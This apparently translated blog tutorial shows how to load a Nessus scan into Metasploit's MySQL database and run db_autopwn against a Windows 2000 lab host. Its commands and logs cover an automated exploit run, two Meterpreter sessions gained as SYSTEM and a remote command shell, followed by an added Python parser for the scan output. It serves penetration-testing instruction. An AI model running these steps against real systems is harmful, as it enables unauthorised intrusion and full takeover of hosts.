
Using the Nessus plugin with MySQL and db_autopwn in Metasploit


Now I will refine the tests by using MySQL to keep the targets and their vulnerabilities in a database, exploiting them automatically with db_autopwn.

The test environment stays the same:

Debian host with Nessus, Metasploit and MySQL
Windows 2000 host

Prerequisite for the tests:

Have the following items installed:
libdbd-mysql-ruby1.8
The activerecord module (gem install activerecord)

Preparing the environment

Start the MySQL driver in MSF
msf> db_driver mysql

I connected to the database server and created a database called msf

msf> db_connect msf:******@localhost/msf

I imported the Nessus report into the database

msf> nessus_report_get af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Listing the ports from the msf database

msf> db_services

Services
========

created_at info name port proto state updated_at Host Workspace
---------- ---- ---- ---- ----- ----- ---------- ---- ---------
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 epmap 135 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 netbios-ns 137 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 smb 139 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 cifs 445 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1025 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 dce-rpc 1028 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5801 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5900 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default


Listing the vulnerabilities from the msf database

msf > db_vulns

[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5900 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5801 proto=tcp name=NSS-24260 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10107 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-43111 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=1028 proto=udp name=NSS-10736 refs=

....
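As an added example (not code from the original post), the Python below parses the db_services and db_vulns output shown above into a per-service inventory, the same join the msf database holds once the Nessus report is imported; the sample rows are constructed copies of the lines above, and the regular expressions are assumptions about the column layout of this Metasploit version.

```python
import re
from collections import defaultdict

# Constructed sample rows, copied in shape from the db_services and db_vulns
# output above (one host, a subset of rows; the 135/udp row has an empty name).
SERVICES_OUTPUT = """\
Fri Oct 01 12:06:03 UTC 2010 ftp 21 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 135 udp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 www 5800 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
Fri Oct 01 12:06:03 UTC 2010 vnc 5901 tcp open Fri Oct 01 12:06:03 UTC 2010 192.168.0.6 default
"""
VULNS_OUTPUT = """\
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-19288 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5901 proto=tcp name=NSS-10342 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=21 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Oct 01 12:06:03 UTC 2010 Vuln: host=192.168.0.6 port=5800 proto=tcp name=NSS-10758 refs=
"""

TIMESTAMP = r"\w{3} \w{3} \d\d \d\d:\d\d:\d\d \w+ \d{4}"
SERVICE_RE = re.compile(  # the name column is optional: the 135/udp row has none
    rf"^{TIMESTAMP} (?:(?P<name>\S+) )?(?P<port>\d+) (?P<proto>tcp|udp) (?P<state>\w+) "
    rf"{TIMESTAMP} (?P<host>\d+\.\d+\.\d+\.\d+) (?P<workspace>\S+)$"
)
VULN_RE = re.compile(
    r"Vuln: host=(?P<host>\S+) port=(?P<port>\d+) proto=(?P<proto>\w+) name=(?P<name>\S+)"
)

def parse_services(text):
    """Map (host, port, proto) -> service name for every row whose state is 'open'."""
    services = {}
    for line in text.splitlines():
        m = SERVICE_RE.match(line.strip())
        if m and m["state"] == "open":
            services[(m["host"], int(m["port"]), m["proto"])] = m["name"] or "unknown"
    return services

def parse_vulns(text):
    """Map (host, port, proto) -> list of Nessus plugin ids (NSS-...) reported there."""
    vulns = defaultdict(list)
    for line in text.splitlines():
        m = VULN_RE.search(line)
        if m:
            vulns[(m["host"], int(m["port"]), m["proto"])].append(m["name"])
    return dict(vulns)

def inventory(services, vulns):
    """Join both views: each open service with the findings attached to it. Services
    with no finding stay listed, so a port with no Nessus result is not silently dropped."""
    return {k: (n, sorted(vulns.get(k, []))) for k, n in sorted(services.items())}
```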


db_autopwn

db_autopwn scans the database and builds a list of exploit modules specific to each vulnerability present on the target. The modules are selected in two ways:

1 - Exploits are selected by analysing the vulnerability list. This kind of cross-referencing depends on standards such as OSVDB, Bugtraq and CVE to link the exploit to the target.

2 - The default ports associated with each exploit are used to locate targets running the same service.

msf > db_autopwn

[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds


Time for action

msf > db_autopwn -p -t -e

[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.6:5800 exploit/windows/vnc/winvnc_http_get (port match)
[*] 192.168.0.6:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/filecopa_list_overflow (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/servu_mdtm (port match)
[*] 192.168.0.6:21 exploit/windows/ftp/easyfilesharing_pass (port match)
[*] 192.168.0.6:445 exploit/windows/smb/netidentity_xtierrpcpipe (port match)
[*] 192.168.0.6:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.0.6:445 exploit/linux/samba/trans2open (port match)
....


================================================================================
[*] (1/81 [0 sessions]): Launching exploit/windows/vnc/winvnc_http_get against 192.168.0.6:5800...
[*] (2/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.0.6:445...
[*] (3/81 [0 sessions]): Launching exploit/windows/ftp/filecopa_list_overflow against 192.168.0.6:21...
[*] (4/81 [0 sessions]): Launching exploit/windows/ftp/servu_mdtm against 192.168.0.6:21...
[*] (5/81 [0 sessions]): Launching exploit/windows/ftp/easyfilesharing_pass against 192.168.0.6:21...
[*] (6/81 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.6:445...
[*] (7/81 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.0.6:445...
[*] (8/81 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.0.6:445...
[*] (9/81 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.0.6:139...
....

[*] (81/81 [0 sessions]): Waiting on 35 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.0.3:46168 -> 192.168.0.6:15979) at Fri Oct 01 10:37:39 -0300 2010
[*] Meterpreter session 2 opened (192.168.0.3:43223 -> 192.168.0.6:24353) at Fri Oct 01 10:37:40 -0300 2010
[*] (81/81 [2 sessions]): Waiting on 22 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 12 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (81/81 [2 sessions]): Waiting on 11 launched modules to finish execution...
....

[*] The autopwn command has completed with 2 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id Type Information Connection Via
-- ---- ----------- ---------- ---

1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:46168 -> 192.168.0.6:15979 exploit/windows/dcerpc/ms03_026_dcom
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ W2KVITIMA 192.168.0.3:43223 -> 192.168.0.6:24353 exploit/windows/dcerpc/ms03_026_dcom

[*] ================================================================================



Starting the session

msf > sessions -i 1

[*] Starting interaction with 1...

meterpreter > execute -i -H -f cmd.exe

Process 736 created.
Channel 1 created.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>



Important notes:

0 - This is not magic, it is technology

1 - These tests are entirely experimental;

2 - Using these tools and actions requires some prior knowledge, such as:
Understanding operating systems;
Understanding the TCP/IP protocol in depth;
Understanding how exploits, payloads, shellcodes etc. work;
Understanding the dynamics of the causes and impacts of vulnerabilities;
Using this knowledge ethically;

_________________
Signed: Alan Menezes
Metasploit enthusiast